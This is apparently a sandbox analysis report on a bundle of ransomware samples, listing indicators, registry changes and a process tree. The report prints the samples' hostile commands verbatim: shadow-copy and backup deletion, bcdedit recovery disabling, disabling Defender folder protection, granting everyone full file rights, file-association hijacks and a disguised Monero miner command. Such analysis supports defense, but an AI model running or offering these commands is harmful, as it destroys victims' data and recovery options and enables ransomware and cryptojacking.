536 | 3772 | WerFault.exe | 111
4936 | 1840 | WerFault.exe |
1804 | 540 | WerFault.exe | 107
1896 | 4312 | WerFault.exe | 110
-
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
-
Discovers systems in the same network 1 TTPs 1 IoCs
pid | Process
1496 | net.exe
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
3684 | vssadmin.exe
-
Kills process with taskkill 1 IoCs
pid | Process
1680 | taskkill.exe
-
Modifies Control Panel 4 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\ | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\Mig~mig.SCR" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
-
Modifies registry class 16 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid | Process
4740 | 7zFM.exe
900 | taskmgr.exe
-
Suspicious behavior: LoadsDriver 64 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 64 IoCs
PID | Process
4740 | 7zFM.exe
3704 | taskmgr.exe
900 | taskmgr.exe
(The original listing holds 64 entries, one per call, repeating only these three PID/process pairs.)
Suspicious use of SendNotifyMessage 64 IoCs
PID | Process
3704 | taskmgr.exe
900 | taskmgr.exe
(The original listing holds 64 entries, one per call, repeating only these two PID/process pairs.)
Suspicious use of SetWindowsHookEx 12 IoCs
PID | Process
2272 | Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe (3 entries)
3548 | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
4108 | cmd.exe
5916 | xk.exe
5468 | IExplorer.exe
6276 | WINLOGON.EXE
5248 | CSRSS.EXE
6668 | SERVICES.EXE
5404 | LSASS.EXE
6200 | SMSS.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Description | PID | Process | procid_target | Entries
PID 3704 wrote to memory of 900 | 3704 | taskmgr.exe | 97 | 2
PID 4640 wrote to memory of 4108 | 4640 | powershell.exe | 103 | 2
PID 4108 wrote to memory of 4384 | 4108 | cmd.exe | 105 | 2
PID 4108 wrote to memory of 4696 | 4108 | cmd.exe | 106 | 3
PID 4108 wrote to memory of 540 | 4108 | cmd.exe | 107 | 3
PID 4108 wrote to memory of 4776 | 4108 | cmd.exe | 108 | 3
PID 4108 wrote to memory of 3156 | 4108 | cmd.exe | 109 | 2
PID 4108 wrote to memory of 4312 | 4108 | cmd.exe | 110 | 3
PID 4108 wrote to memory of 3772 | 4108 | cmd.exe | 111 | 3
PID 4108 wrote to memory of 1052 | 4108 | cmd.exe | 114 | 2
PID 4108 wrote to memory of 3944 | 4108 | cmd.exe | 116 | 3
PID 4108 wrote to memory of 3328 | 4108 | cmd.exe | 117 | 3
PID 4108 wrote to memory of 3548 | 4108 | cmd.exe | 118 | 3
PID 4108 wrote to memory of 1840 | 4108 | cmd.exe | 119 | 3
PID 4108 wrote to memory of 2272 | 4108 | cmd.exe | 121 | 3
PID 1052 wrote to memory of 244 | 1052 | HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe | 124 | 3
PID 2272 wrote to memory of 1680 | 2272 | Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe | 128 | 3
PID 3944 wrote to memory of 3204 | 3944 | HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe | 129 | 2
PID 3328 wrote to memory of 4480 | 3328 | HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe | 132 | 10
PID 2272 wrote to memory of 2092 | 2272 | Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe | 134 | 3
PID 3204 wrote to memory of 3684 | 3204 | cmd.exe | 136 | 2
PID 4480 wrote to memory of 6048 | 4480 | HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe | 142 | 1
(Identical rows in the original listing are collapsed; the Entries column gives how many times each row occurs, 64 in total.)
System policy modification 1 TTPs 6 IoCs
Description | IoC | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions = "1" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00435.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4740
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4384 -
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2272 -
C:\WINDOWS\System32\nslookup.exeC:\WINDOWS\System32\nslookup.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.2miners.com:2222 --user=46dBBki3MyQ36pHViG2pJtci9HiEaTaPx75YK8eH8nqhLseWa1zWtKACNKz4tvMtBkfFpwy4grhSjL83GV24qadmE33huf2 --pass= --cpu-max-threads-hint=40 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=80 --unam-stealth5⤵PID:2864
-
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4696
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 19044⤵
- Program crash
PID:1804
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- System policy modification
PID:4776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mohn5h45\mohn5h45.cmdline"4⤵
- System Location Discovery: System Language Discovery
PID:6296 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF3B2.tmp" "c:\Users\Admin\AppData\Local\Temp\mohn5h45\CSC723DC7E5A15C4DC0BDF878C0605AD31A.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:5576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:2444
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:3280
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:6632
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:4384
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:5408
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6024
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance4⤵
- System Location Discovery: System Language Discovery
PID:6612
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLWriter start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6556
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SstpSvc start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4860
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config MBAMService start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1564
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin4⤵
- System Location Discovery: System Language Discovery
PID:6624
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin4⤵
- System Location Discovery: System Language Discovery
PID:5068
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SSDPSRV start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6716
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config FDResPub start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config fdPHost start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6320
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config Dnscache start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:288
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config upnphost start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:7028
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5908
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes4⤵
- Executes dropped EXE
PID:2832
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol4⤵
- Executes dropped EXE
PID:4464
-
-
C:\Windows\SysWOW64\mountvol.exe"mountvol.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6244
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\mountvol.exe" A: \\?\Volume{0576a638-0000-0000-0000-100000000000}\4⤵
- Executes dropped EXE
PID:652
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\mountvol.exe" B: \\?\Volume{0576a638-0000-0000-0000-d01200000000}\4⤵
- Executes dropped EXE
PID:4740
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\mountvol.exe" E: \\?\Volume{0576a638-0000-0000-0000-f0ff3a000000}\4⤵
- Executes dropped EXE
PID:6724
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\mountvol.exe" G: \\?\Volume{a31980c4-84ce-11ef-af16-806e6f6e6963}\4⤵
- Executes dropped EXE
PID:2600
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q4⤵
- Executes dropped EXE
PID:2852
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q4⤵
- Executes dropped EXE
PID:6524
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q4⤵
- Executes dropped EXE
PID:5580
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a4⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
PID:6424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" view4⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:1496
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Foreign.gen-a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc.exe3⤵
- Executes dropped EXE
PID:3156
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Convagent.gen-581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4312 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 18124⤵
- Program crash
PID:1896
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545.exeHEUR-Trojan-Ransom.Win32.GandCrypt.gen-612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3772 -s 4804⤵
- Program crash
PID:536
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exeHEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Users\Admin\Desktop\00435\test.exe"C:\Users\Admin\Desktop\00435\test.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:244
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exeHEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:3684
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6980
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:6796
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:6824
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
PID:6856
-
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exeHEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3328 -
